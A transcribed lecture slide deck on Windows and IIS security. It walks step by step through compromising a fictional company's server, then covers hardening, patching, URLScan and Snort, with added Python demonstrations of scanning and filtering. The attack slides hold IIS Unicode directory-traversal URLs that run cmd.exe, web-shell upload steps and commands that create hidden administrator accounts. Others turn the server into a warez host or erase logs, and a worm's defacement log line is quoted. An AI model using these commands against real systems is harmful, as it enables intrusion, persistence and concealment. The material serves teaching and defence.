Post on 14-Jan-2016
Slide 1
Windows Security Analysis
Computer Science E-Commerce Security
Matthew Cook
http://escarpment.net/
Slide 2
Introduction
Loughborough University  http://www.lboro.ac.uk/computing/
Janet Web Cache Service  http://wwwcache.ja.net/
Slide 3
Windows Security Analysis
Introduction
Step-by-step Machine Compromise
Preventing Attack
Further Reading
The Future
Slide 4
Introduction
Physical Security
Security Threats
“Hacker” or “Cracker”
The Easiest Security Improvement
Can you buy security?
Slide 5
Physical Security
Secure location
BIOS restrictions
Password protection
Boot devices
Case locks
Case panels
Slide 6
Security Threats
Denial of Service
Theft of information
Modification
Fabrication (Spoofing or Masquerading)
Slide 7
Security Threats…
Why a compromise can occur:
Physical security holes
Software security holes
Incompatible usage security holes
Social engineering
Complacency
Slide 8
8
““Hacker” or “Cracker”Hacker” or “Cracker”
““Hacker” used primarily by the media to Hacker” used primarily by the media to describe malicious attacks by individualsdescribe malicious attacks by individuals
However the computing community uses However the computing community uses “Cracker” to mean the same“Cracker” to mean the same
A “Hacker” tinkers with systems for good A “Hacker” tinkers with systems for good purposes. (Not breaking the law)purposes. (Not breaking the law)
To avoid confusion many people now sayTo avoid confusion many people now say“A machine has been compromised!”“A machine has been compromised!”Not “A machine has been hacked!”Not “A machine has been hacked!”
Slide 9
The Easiest Security Improvement
Good passwords
Usernames and passwords are the primary security defence
Use a password that is easy to type quickly, to give ‘shoulder surfers’ less chance to read it
Use the first letters from song titles, song lyrics or film quotations
Slide 10
Can you buy Security?
“This system is secure.” A product vendor might say: “This product makes your network secure.” Or: “We secure e-commerce.” Inevitably, these claims are naïve and simplistic. They look at the security of the product, rather than the security of the system. The first questions to ask are: “Secure from whom?” and “Secure against what?”
Bruce Schneier
Slide 11
Step-by-step Machine Compromise
Background
Gathering Information
Identifying System Weakness
Exploiting the Security Hole
Gaining ‘Root’
Backdoor Access
System Alteration
Audit Trail Removal
Slide 12
Background
Reasons for attack:
Personal issues
Political statement
Financial gain (theft of money, information)
Learning experience
DoS (Denial of Service)
Support for illegal activity
In our scenario we are going to attack the company laggyband.com
Slide 13
Gathering Information
Companies House
Internet search
URL: http://www.google.co.uk
Whois
URL: http://www.netsol.com/cgi-bin/whois/whois
A Whois query can provide:
– The registrant
– The domain names registered
– The administrative, technical and billing contacts
– Record updated and created date stamps
– DNS servers for the domain
Slide 14
Gathering Information…
Use nslookup or dig
dig @dns.laggyband.com www.laggyband.com
Different query types available:
– A – Network address
– ANY – All or any information available
– MX – Mail exchange records
– SOA – Start of Authority
– HINFO – Host information
– AXFR – Zone transfer (a well-run name server refuses this to anyone but its own secondary servers)
– TXT – Additional strings
Slide 15
Identifying System Weakness
Many products available:
Nmap
Nessus
Pandora
Pwdump
L0pht Crack
Null Authentication
Slide 16
Nmap
Port scanning tool
Stealth scanning, OS fingerprinting
Open source
Runs under Unix-based OS; a port to Win32 is under development
URL: http://www.insecure.org/nmap/
Slide 17
Nmap
Slide 18
Nessus
Remote security scanner similar to Typhon
Very comprehensive
Frequently updated modules
Testing of DoS attacks
Open source
Win32 and Java clients
URL: http://nessus.org/
Slide 19
Pandora
Not strictly Windows security
Runs on either Unix or Win32
Excellent tool to evaluate Netware security
Open source
Lots of additional information
URL: http://www.nmrc.org/pandora/
Slide 20
pwdump
Version 3 (e = encrypted)
Developed by Phil Staubs and Erik Hjelmstad
Based on pwdump and pwdump2
URL: http://www.ebiz-tech.com/html/pwdump.html
Needs administrative privileges
Extracts hashes even if SYSKEY is installed
Extracts from remote machines
Identifies accounts with no password
Self-contained utility
Slide 21
L0pht Crack
Password auditing and recovery
Cracks passwords from many sources
Registration $249
URL: http://www.atstake.com/research/lc3/
Slide 22
L0pht Crack
Cracks passwords from:
Local machine
Remote machine
SAM file
SMB sniffer
pwdump file
Slide 23
Nmap Analysis
nmap -sP 158.125.0.0/16
Dependent on ICMP (Internet Control Message Protocol) echo replies, which a firewall may block
nmap -sP -PT80 158.125.0.0/16
Dependent on a TCP reply (SYN/ACK or RST) from port 80 instead of ICMP, so it finds hosts where ICMP is filtered
Slide 24
Nmap Analysis…
TCP Connect Scan
Completes a ‘three-way handshake’
Very noisy (detection by IDS; the completed connection also shows up in application logs)
Slide 25
Nmap Analysis…
TCP SYN Scan
Half-open scanning (full TCP connection not made: the scanner answers the SYN/ACK with a RST)
Less noisy than the TCP Connect Scan
Slide 26
Nmap Analysis…
TCP FIN Scan
– FIN packet sent to target port
– RST returned for all closed ports
– Mostly works against UNIX-based TCP/IP stacks (RFC 793 behaviour); the Windows stack returns RST from open ports as well, so every port looks closed
TCP Xmas Tree Scan
– Sends a packet with FIN, URG and PUSH set
– RST returned for all closed ports
TCP Null Scan
– Turns off all flags
– RST returned for all closed ports
UDP Scan
– UDP packet sent to target port
– “ICMP Port Unreachable” for closed ports
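An added example, not part of the original slides: the Python below models how a scanner infers port state from the responses listed above, for a stack that follows RFC 793 (most Unix stacks) and for one that, like Windows NT/2000, answers FIN, Xmas and Null probes to open ports with RST. The scan names, the `rfc793_stack` switch and the simulated host are constructed for the demonstration.

```python
"""Model of how a scanner infers port state from the responses on the slide.

Added example, not from the original presentation. Two stack behaviours are
modelled: RFC 793 (most Unix stacks) and the Windows NT/2000 stack, which
answers FIN/Xmas/Null probes to open ports with RST as well.
"""

PROBE_FLAGS = {
    "connect": {"SYN"},            # full handshake; same first segment as the SYN scan
    "syn": {"SYN"},                # half-open: the final ACK is never sent
    "fin": {"FIN"},
    "xmas": {"FIN", "URG", "PSH"},
    "null": set(),
}


def stack_response(scan, port_open, rfc793_stack=True):
    """Return what the target sends back for one probe, or None for silence."""
    if scan == "udp":
        # Nothing listening: the kernel answers with ICMP port unreachable.
        return None if port_open else "ICMP port unreachable"
    flags = PROBE_FLAGS[scan]
    if not port_open:
        # A closed port answers any non-RST segment with RST (RFC 793).
        return "RST"
    if "SYN" in flags:
        return "SYN/ACK"
    if rfc793_stack:
        # Open port, segment with no SYN/RST/ACK: dropped without a reply.
        return None
    # Windows NT/2000 replies RST from open ports too, so the probe learns nothing.
    return "RST"


def infer_state(scan, response):
    """The scanner's conclusion from a single response."""
    if scan in ("connect", "syn"):
        return "open" if response == "SYN/ACK" else "closed"
    if scan == "udp":
        return "closed" if response == "ICMP port unreachable" else "open|filtered"
    # FIN/Xmas/Null: only RST is informative; silence may mean open or filtered.
    return "closed" if response == "RST" else "open|filtered"


def scan_host(scan, open_ports, ports, rfc793_stack=True):
    """Run one scan type against a simulated host and return {port: state}."""
    return {
        p: infer_state(scan, stack_response(scan, p in open_ports, rfc793_stack))
        for p in ports
    }


if __name__ == "__main__":
    listening = {80, 139}              # constructed host: web and NetBIOS session
    for stack, rfc in (("unix", True), ("windows2000", False)):
        for scan in ("syn", "fin", "xmas", "null"):
            print(f"{stack:12s} {scan:5s}", scan_host(scan, listening, [80, 139, 445], rfc))
```

Against the Unix model the FIN scan reports port 80 as open|filtered and 445 as closed; against the Windows model every port comes back closed, which is the slide's "mostly works on UNIX stacks" in one table.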
Slide 27
Null Authentication
Null authentication (a null session):
net use \\camford\IPC$ "" /u:""
Famous tools like ‘Red Button’
net view \\camford
List of users, groups and shares
Last logged-on date
Last password change
Much more…
Slide 28
Exploiting the Security Hole
Using IIS Unicode/Directory Traversal
/scripts/../../winnt/system32/cmd.exe /c+dir  (a plain ‘..’ is rejected by IIS)
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir  (‘%c0%af’ is an overlong UTF-8 encoding of ‘/’ that IIS only decoded after its traversal check)
Displays the listing of C: in the browser
Copy cmd.exe to /scripts/root.exe
Echo upload.asp:
GET /scripts/root.exe /c+echo+[blah]>upload.asp
Upload cmdasp.asp using upload.asp
Still vulnerable on 24% of e-commerce servers
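Why the encoded request succeeds while the plain one fails: IIS looked for `..` in the URL before decoding it, and its UTF-8 decoder accepted overlong sequences, so `%c0%af` (a two-byte encoding of `/`, which a strict decoder must reject) only became a path separator after the check had passed. The Python below is an added example written for this page, not the slides' exploit code; `DOC_ROOT`, the Unix-style stand-in paths and the two check functions are assumptions made for the demonstration.

```python
import posixpath
import urllib.parse

# Added example, not the slides' exploit. Unix-style stand-ins for C:\Inetpub
# and C:\winnt; the /scripts virtual directory maps to DOC_ROOT + "/scripts",
# as it did on a default IIS 4/5 install.
DOC_ROOT = "/inetpub"


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 the way the vulnerable IIS code did: overlong forms accepted.

    A conforming decoder must reject a two-byte sequence whose value fits in
    seven bits. This one does not, so C0 AF decodes to '/' and C1 9C to '\\'.
    Sequences longer than two bytes are not needed here and become U+FFFD.
    """
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b < 0xE0 and i + 1 < len(data) and 0x80 <= data[i + 1] < 0xC0:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def strict_utf8_decode(data: bytes):
    """Python's decoder, which rejects overlong sequences; None if invalid."""
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return None


def vulnerable_path_check(request_path: str) -> str:
    """The vulnerable order: look for '..' segments in the raw URL, then decode."""
    if ".." in request_path.replace("\\", "/").split("/"):
        raise PermissionError("traversal rejected")
    decoded = lenient_utf8_decode(urllib.parse.unquote_to_bytes(request_path))
    return posixpath.normpath(DOC_ROOT + decoded.replace("\\", "/"))


def fixed_path_check(request_path: str) -> str:
    """The fixed order: decode strictly first, canonicalise, then check the root."""
    decoded = strict_utf8_decode(urllib.parse.unquote_to_bytes(request_path))
    if decoded is None:
        raise PermissionError("invalid UTF-8 rejected")
    full = posixpath.normpath(DOC_ROOT + decoded.replace("\\", "/"))
    if full != DOC_ROOT and not full.startswith(DOC_ROOT + "/"):
        raise PermissionError("traversal rejected")
    return full


def rejected(check, request_path: str) -> bool:
    """True if the given check refuses the request."""
    try:
        check(request_path)
        return False
    except PermissionError:
        return True


if __name__ == "__main__":
    for url in ("/scripts/../../winnt/system32/cmd.exe",
                "/scripts/..%c0%af../winnt/system32/cmd.exe",
                "/scripts/..%c1%9c../winnt/system32/cmd.exe"):
        for name, check in (("vulnerable", vulnerable_path_check), ("fixed", fixed_path_check)):
            try:
                print(f"{name:10s} {url} -> {check(url)}")
            except PermissionError as e:
                print(f"{name:10s} {url} -> {e}")
```

The vulnerable check lets the `%c0%af` and `%c1%9c` forms reach `/winnt/system32/cmd.exe`, outside the web root, while refusing the plain `../` form; the fixed check refuses all three because the overlong bytes never decode and a canonicalised path is compared against the root.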
Slide 29
Gaining ‘Root’
cmdasp.asp provides a cmd shell, but it runs as the web server's impersonated user rather than SYSTEM
Increase in privileges is now simple
ISAPI.dll – RevertToSelf (Horovitz); version 2 coded by Foundstone
http://camford/scripts/idq.dll?
Patch bulletin: MS01-026
NOT included in Windows 2000 SP2
Slide 30
Backdoor Access
Create several user accounts:
net user iisservice <pass> /ADD
net localgroup administrators iisservice /ADD
Add root shells on high-numbered ports (Tini is 3Kb in size)
Add backdoors to ‘Run’ registry keys
Slide 31
System Alteration
Web page alteration
Information theft
Enable services
Add VNC
Creating a warez server:
net start msftpsvc
Check access
Upload a file 1Mb in size
Advertise as a warez server
Slide 32
Audit Trail Removal
Many machines have auditing disabled
The main problem for the attacker is the IIS logs
DoS IIS before buffered log entries are flushed to disk
Erase logs from the hard disk
Erasing the Event Log is harder
IDS systems and network monitoring at the firewall keep a record the attacker cannot reach from the compromised host
Slide 33
Preventing Attack
NetBIOS/SMB Services
Hfnetchk and Qchain
SNMP Vulnerabilities
Active Directory Vulnerabilities
IPSec
IIS Security
IDS – Snort
.NET Server
Slide 34
NetBIOS/SMB Services
NetBIOS Name Service [UDP 137]
NetBIOS Datagram Service [UDP 138]
RPC endpoint mapper [TCP 135]
NetBIOS Session Service, SMB over NetBIOS [TCP 139]
CIFS, SMB direct [TCP 445, UDP 445]
Port 445 Windows 2000 onwards only
Block these ports at the firewall
Check what is listening with netstat -a
Slide 35
NetBIOS/SMB Services…
To disable NetBIOS:
1. Select ‘Disable NetBIOS over TCP/IP’ in the WINS tab of advanced TCP/IP properties.
2. Deselect ‘File and Printer Sharing for Microsoft Networks’ in the advanced settings of the ‘Network and Dial-up Connections’ window.
Slide 36
NetBIOS/SMB Services…
Disable null authentication
Key similar to Windows NT 4.0:
HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous
REG_DWORD set to 0, 1 or 2 (2 is Windows 2000 only, and breaks anything that still relies on anonymous access, such as NT 4.0 trusts and browsing)
HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous
REG_DWORD set to 0 or 1
Slide 37
Hfnetchk
Use Hfnetchk to check hot fixes
Checks machines against Microsoft's XML list of patches (mssecure.xml)
Automate the process using batch files and a command-line mail client (Postie)
URL: http://www.infradig.com/infradig/postie/
Use QChain to chain hot fixes together without rebooting in between.
Slide 38
Hfnetchk…
Patch details for:
Windows NT 4.0, 2000, XP, .NET Server
IIS 4, IIS 5 and IIS 6
SQL Server 7.0
SQL Server 2000
Internet Explorer 5.01 (and later)
Slide 39
Hfnetchk…
Default scan of local host (pre-downloaded XML):
hfnetchk -x mssecure.xml
Default scan of the lboro domain:
hfnetchk -d lboro
Verbose scan of local host:
hfnetchk -v -x mssecure.xml
Verbose scan including installed hot fixes:
hfnetchk -v -a b -x mssecure.xml
Slide 40
SNMP Vulnerabilities
Simple Network Management Protocol
snmpwalk camford public .1.3.6.1.4.1.77.1.2.25
(the LAN Manager MIB user table: with the default ‘public’ community string this enumerates the local user accounts)
SNMP utilities in the Resource Kit
Turn off SNMP services
Set community names
Set accepted hosts
Slide 41
SNMP Vulnerabilities…
Slide 42
SNMP Vulnerabilities…
CERT Advisory of Tuesday 12th February (CA-2002-03)
Privilege escalation, DoS, instability
Block UDP 161 and 162 at the firewall
Patch or disable SNMP
Patches available for Windows 2000 and XP
URL: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-006.asp
Slide 43
AD Vulnerabilities
Listing of AD contents using ldp.exe
ldp is contained in the Resource Kit
Authenticated connection needed
Filter TCP 389 (LDAP) and 3268 (Global Catalog)
DNS – restrict zone transfers to the slave name servers only
Slide 44
IPSec
IP Security
Linux connectivity using FreeS/WAN
Mainly for wireless use
WEP encryption cracked
URL: http://www.freeswan.org/
URL: http://airsnort.sourceforge.net/
Slide 45
IIS Security
History
Recent Worms
IIS Lock Down Tool
URL Scan
The Future
Slide 46
IIS History
IIS 2.0 installed by NT 4.0
IIS 3.0 followed by the more common IIS 4.0
Quickly gained a reputation for (in)security
IIS 5.0 installed by Windows 2000
IIS 6.0 installed by .NET Server
Microsoft releases Hfnetchk
Closely followed by IIS Lockdown and URLScan
Slide 47
Recent Worms
Sadmind/IIS – Directory Traversal (Unicode exploit)
CodeRed – ida/idq buffer overflow
CodeGreen – ida/idq buffer overflow
Nimda – Directory Traversal (Unicode exploit)
Slide 48
Sadmind/IIS
2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/default.htm 200 -
Slide 49
IIS Lock Down Tool
Automatic ‘Lock Down’ [now 2nd version]
Locks down IIS 4.0 and IIS 5.0
Express ‘lock down’ for simple web sites
Custom ‘lock down’ for more complex servers
Undo facility to reverse the last ‘lock down’
URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=32362
Slide 50
IIS Lock Down Tool…
Disable:
Active Server Pages
Index Server interface
Server Side Includes
Internet Data Connector
Internet Printing
HTR scripting
Remove:
Sample web files
Scripts virtual directory
MSADC directory
WebDAV
Set permissions on:
Exe files
Content directories
Slide 51
URL Scan
ISAPI filter that scans incoming HTTP requests
Filtered based on a rule set
New rules easily added
Default urlscan.ini suitable for static pages
Restart the service when changes are made
A request matching a rule is answered with 404 and logged
URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=32571
Slide 52
URL Scan…
Filter on:
The request method (verb)
File extension
URL encoding
Non-ASCII characters
Malicious character sequences
Headers in the HTTP GET
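An added example, not URLScan's own code: a request filter in Python that applies the kinds of rule listed above, then replays it over constructed W3C-format IIS log lines, including a shortened form of the Sadmind/IIS entry from slide 48 and the Unicode traversal request from slide 28. The values in `RULES` are constructed for the demonstration rather than copied from the shipped urlscan.ini, and the 404 returned for rejected requests follows slide 51.

```python
import posixpath
import urllib.parse
from dataclasses import dataclass

# Constructed rule set in the spirit of urlscan.ini (not the shipped defaults).
# The checks follow the slide: verb, extension, encoding, non-ASCII bytes,
# character sequences and request headers.
RULES = {
    "AllowVerbs": {"GET", "HEAD", "POST"},
    "DenyExtensions": {".exe", ".bat", ".cmd", ".com", ".dll", ".ida", ".idq", ".htr", ".printer"},
    "DenyUrlSequences": ["..", "./", "\\", ":", "%", "&"],
    "DenyHeaders": {"translate", "if", "lock-token"},
    "AllowHighBitCharacters": False,
}


@dataclass
class Verdict:
    allowed: bool
    reason: str = ""
    status: int = 200      # a rejected request is answered with 404


def check_request(verb, uri_stem, headers=None, rules=RULES):
    """Apply the rule set to one request and return a Verdict."""
    headers = headers or {}
    if verb.upper() not in rules["AllowVerbs"]:
        return Verdict(False, "verb not allowed: " + verb, 404)
    for name in headers:
        if name.lower() in rules["DenyHeaders"]:
            return Verdict(False, "denied header: " + name, 404)
    raw_bytes = urllib.parse.unquote_to_bytes(uri_stem)
    if not rules["AllowHighBitCharacters"] and any(b >= 0x80 for b in raw_bytes):
        # Stops %c0%af and friends before any decoder gets to interpret them.
        return Verdict(False, "non-ASCII byte after decoding", 404)
    try:
        decoded = raw_bytes.decode("utf-8")
    except UnicodeDecodeError:
        return Verdict(False, "invalid encoding", 404)
    # Scan both the raw and the decoded form so an encoded '..' is caught either way.
    for seq in rules["DenyUrlSequences"]:
        if seq in uri_stem or seq in decoded:
            return Verdict(False, "denied sequence " + repr(seq), 404)
    ext = posixpath.splitext(decoded)[1].lower()
    if ext in rules["DenyExtensions"]:
        return Verdict(False, "denied extension " + ext, 404)
    return Verdict(True)


# Constructed log: the Sadmind/IIS line with its echo body shortened, the
# Unicode traversal request, a request in the style of CodeRed, and a benign hit.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-bytes
2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^<html^>...^</html^>>../wwwroot/default.htm 200 -
2001-05-03 22:35:02 203.67.x.x - 158.125.x.x 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 -
2001-07-19 10:12:33 10.1.2.3 - 158.125.x.x 80 GET /default.ida NNNNNNNNNNNNNNNNNN%u9090%u6858 200 -
2001-07-19 10:13:01 10.1.2.4 - 158.125.x.x 80 GET /index.htm - 200 1423
""".splitlines()


def scan_iis_log(lines, rules=RULES):
    """Replay W3C extended IIS log lines through the filter.

    Returns (client ip, verb, uri stem, logged status, reason) for each request
    the filter would have stopped. Field positions come from the #Fields:
    directive, as they must in a real parser.
    """
    idx = {}
    blocked = []
    for line in lines:
        if line.startswith("#Fields:"):
            idx = {name: i for i, name in enumerate(line.split()[1:])}
            continue
        if not line.strip() or line.startswith("#") or not idx:
            continue
        f = line.split()
        verb, stem, status = f[idx["cs-method"]], f[idx["cs-uri-stem"]], f[idx["sc-status"]]
        verdict = check_request(verb, stem, rules=rules)
        if not verdict.allowed:
            blocked.append((f[idx["c-ip"]], verb, stem, status, verdict.reason))
    return blocked


if __name__ == "__main__":
    for entry in scan_iis_log(SAMPLE_LOG):
        print(entry)
```

Three of the four log entries are stopped: `root.exe` and `default.ida` on their extension, and the `%c0%af` request on the high-bit byte before the rule set ever has to recognise the traversal, which is why the slide's default `urlscan.ini` could protect static sites against the worms of the time without knowing their signatures.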
Slide 53
The Future
Gartner report recommends ditching IIS
Rewrite of IIS on the cards for version 6
Lock Down Tool (interim measure)
Httpd functionality in the kernel (TechEd)
IIS Lockdown included in SP3
Further implications for .NET
Slide 54
IDS Snort
IDS – Intrusion Detection System
Libpcap packet sniffer and logger
Originally developed for the Unix platforms
Open source
Port to Win32 available (release 1.8.1)
Installation on Win32 in under 30 minutes
Run on your IIS server or standalone
Slide 55
IDS Snort…
Snort can detect:
Stealth port scans
CGI attacks
Front Page Extensions attacks
ICMP activity
SMTP activity
SQL activity
SMB probes
Slide 56
IDS Snort…
Default logging to snort\logs\alert.ids
Log to MySQL and SQL Server
Notification as logs, ‘winpopup’, email etc.
SnortSnarf or ACID (PHP based)
GUI – IDScenter
URL: http://snort.sourcefire.com/
URL: http://www.cert.org/kb/acid/
URL: http://www.silicondefense.com/
Slide 57
Snort…
Slide 58
.NET Server
Slide 59
.NET Server…
            Web Server   Standard Server   Enterprise Server   Datacenter Server
RAM         2Gb          4Gb               64Gb                128Gb
CPU         2            2                 8                   32
Cluster     N/A          N/A               4 node              8 node
64-bit      N/A          N/A               Yes                 Yes
Notes       WWW          SOHO              Large Site          OEM Only
Slide 60
.NET Server…
Mainly improvements in AD and management
Blank passwords usable at the console only
Improved command-line tools
Evaluating security on build 3590
IIS currently secure from install
Auditing enabled by default
Integrated change log
XML output
Slide 61
.NET Server…
Slide 62
.NET Server…
Slide 63
.NET Server…
Slide 64
.NET Server…
Slide 65
.NET Server…
Slide 66
Further Reading
Schneier, B. Secrets & Lies (Digital Security in a Networked World) [ISBN 0471253111]
Hacking Exposed series, McGraw-Hill
Security Focus Bugtraq
Google
Slide 67
Questions